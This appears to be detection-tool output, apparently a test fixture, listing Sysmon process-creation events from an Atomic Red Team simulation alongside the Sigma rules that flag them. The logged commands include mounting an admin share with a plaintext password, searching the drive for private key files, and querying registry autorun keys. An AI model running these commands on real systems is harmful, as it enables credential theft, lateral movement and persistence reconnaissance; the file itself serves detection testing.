+2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 3284 | PGUID: 747F3D96-D849-5D31-0000-0010E54F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D849-5D31-0000-00103C522F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,LatMov,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D84E-5D31-0000-00102C702F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6524 | PGUID: 747F3D96-D859-5D31-0000-0010E68C2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-D859-5D31-0000-0010FB8F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D859-5D31-0000-001045922F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .key | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D859-5D31-0000-00109E932F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3188 | PGUID: 747F3D96-D87B-5D31-0000-0010D92D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2888 | PGUID: 747F3D96-D87C-5D31-0000-0010E83B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D87C-5D31-0000-0010413E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D87C-5D31-0000-00107A403100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 5256 | PGUID: 747F3D96-D87C-5D31-0000-0010CC423100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D87C-5D31-0000-001009453100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 6208 | PGUID: 747F3D96-D87C-5D31-0000-00105B473100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D87C-5D31-0000-001097493100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D87C-5D31-0000-0010E94B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1428 | PGUID: 747F3D96-D87C-5D31-0000-0010264E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D87C-5D31-0000-001078503100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D87C-5D31-0000-0010B4523100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D87C-5D31-0000-001006553100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D87C-5D31-0000-00103F573100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | LID: 0x50951 | PID: 4360 | PGUID: 747F3D96-D87C-5D31-0000-001080593100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 956 | PGUID: 747F3D96-D87C-5D31-0000-0010CA5B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D87C-5D31-0000-00101D5E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6832 | PGUID: 747F3D96-D87C-5D31-0000-001056603100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 6436 | PGUID: 747F3D96-D87C-5D31-0000-0010A8623100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5936 | PGUID: 747F3D96-D87C-5D31-0000-0010E1643100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D87C-5D31-0000-001033673100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1740 | PGUID: 747F3D96-D87C-5D31-0000-00107C693100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 644 | PGUID: 747F3D96-D87C-5D31-0000-0010C86B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4220 | PGUID: 747F3D96-D87C-5D31-0000-0010056E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | LID: 0x50951 | PID: 6620 | PGUID: 747F3D96-D87C-5D31-0000-001057703100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D87D-5D31-0000-001090723100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 3172 | PGUID: 747F3D96-D87D-5D31-0000-0010E2743100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2148 | PGUID: 747F3D96-D87D-5D31-0000-00102B773100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 1472 | PGUID: 747F3D96-D87D-5D31-0000-00107D793100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
